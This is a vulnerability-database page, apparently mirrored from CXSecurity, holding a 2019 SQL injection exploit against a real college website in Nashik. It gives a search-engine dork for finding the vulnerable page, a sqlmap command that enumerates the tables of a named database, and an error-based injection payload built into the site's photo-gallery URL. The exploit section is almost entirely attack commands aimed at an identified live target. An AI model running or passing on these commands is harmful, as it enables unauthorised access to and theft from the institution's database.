College of Architecture SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1615729 漏洞类型
发布时间 2019-05-20 更新时间 2019-05-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050213
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:College of Architecture SQL Injection
/////////////////////////////////////////////////////////////////////////////////////////////////////
# Date:17.05.2019
/////////////////////////////////////////////////////////////////////////////////////////////////////

# Dork :intitle:"College of Architecture and Center for Design Nashik" photo-gallery.php?id=3
/////////////////////////////////////////////////////////////////////////////////////////////////////

# Exploit Author:Cerkuday
/////////////////////////////////////////////////////////////////////////////////////////////////////

# Tested on:Windows &Kali Linux


#Demo

http://www.cansnashik.org/photo-gallery.php?id=3


# Poc:

sqlmap -u "http://www.cansnashik.org/photo-gallery.php?id=3"  --text-only  --random-agent -D cansnash_cansnsk --tables

http://www.cansnashik.org/photo-gallery.php?id=3 OR (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(6854=6854,1))),0x7170627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)